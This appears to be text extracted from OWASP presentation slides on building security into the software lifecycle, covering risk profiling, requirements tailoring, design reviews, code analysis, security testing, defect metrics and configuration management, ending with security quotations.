More security for riskier applications
Ensures that you work the most critical issues first
Scales to hundreds or thousands of applications
Tools and Methodology
Security profiling tools can gather facts
Size, complexity, security mechanisms, dangerous calls
Questionnaire to gather risk information
Asset value, available functions, users, environment, threats
Risk-based approach
Evaluates likelihood and consequences of successful attack
160. The OWASP Foundation
http://www.owasp.org
Application Security
Project Plan
Define the plan to ensure security at the end
Ideally done at start of project
Can also be started before or after development is complete
Based on the risk category
Identify activities at each phase
Necessary people and expertise required
Who has responsibility for risks
Ensure time and budget for security activities
Establish framework for establishing the “line of sight”
161. The OWASP Foundation
http://www.owasp.org
Application Security
Requirements Tailoring
Get the security requirements and policy right
Start with a generic set of security requirements
Must include all security mechanisms
Must address all common vulnerabilities
Can be use (or misuse) cases
Should address all driving requirements (regulation, standards, best
practices, etc.)
Tailoring examples…
Specify how authentication will work
Detail the access control matrix (roles, assets, functions, permissions)
Define the input validation rules
Choose an error handling and logging approach
162. The OWASP Foundation
http://www.owasp.org
Design Reviews
Better to find flaws early
Security design reviews
Check to ensure design meets requirements
Also check to make sure you didn’t miss a requirement
Assemble a team
Experts in the technology
Security-minded team members
Do a high-level threat model against the design
Be sure to do root cause analysis on any flaws identified
Threat model anyone?
163. The OWASP Foundation
http://www.owasp.org
Software Vulnerability Analysis
Find flaws in the code early
Many different techniques
• Static (against source or compiled code)
Security focused static analysis tools
Peer review process
Formal security code review
• Dynamic (against running code)
Scanning
Penetration testing
Goal
Ensure completeness (across all vulnerability areas)
Ensure accuracy (minimize false alarms)
164. The OWASP Foundation
http://www.owasp.org
Application Security Testing
Identify security flaws during testing
Develop security test cases
Based on requirements
Be sure to include “negative” tests
Test all security mechanisms and common vulnerabilities
Flaws feed into defect tracking and root cause
analysis
165. The OWASP Foundation
http://www.owasp.org
Application Security Defect Tracking and
Metrics
“Every security flaw is a process problem”
Tracking security defects
Find the source of the problem
Bad or missed requirement, design flaw, poor implementation, etc…
ISSUE: can you track security defects the same way as other defects
Metrics
What lifecycle stage are most flaws originating in?
What security mechanisms are we having trouble implementing?
What security vulnerabilities are we having trouble avoiding?
166. Metrics: We can measure what problems we have
Measure: We cant improve what we cant measure
Priority: If we can measure we can prioritise
Delta: If we can measure we can detect change
Apply: We can apply our (limited) budget on the right things
Improve: We can improve where it matters……
Value: Demonstrate value to our business
Answer the question: “Are we secure?” <- a little better
167. The OWASP Foundation
http://www.owasp.org
Configuration Management and
Deployment
Ensure the application configuration is secure
Security is increasingly “data-driven”
XML files, property files, scripts, databases, directories
How do you control and audit this data?
Design configuration data for audit
Put all configuration data in CM
Audit configuration data regularly
Don’t allow configuration changes in the field
168. The OWASP Foundation
http://www.owasp.org
What now?
"So now, when we face a choice between adding
features and resolving security issues, we need to
choose security.” -Bill Gates
If you think technology can solve your security
problems, then you don't understand the problems
and you don't understand the technology.
-Bruce Schneier
Using encryption on the Internet is the equivalent of arranging
an armored car to deliver credit-card information from someone
living in a cardboard box to someone living on a park bench.
-Gene Spafford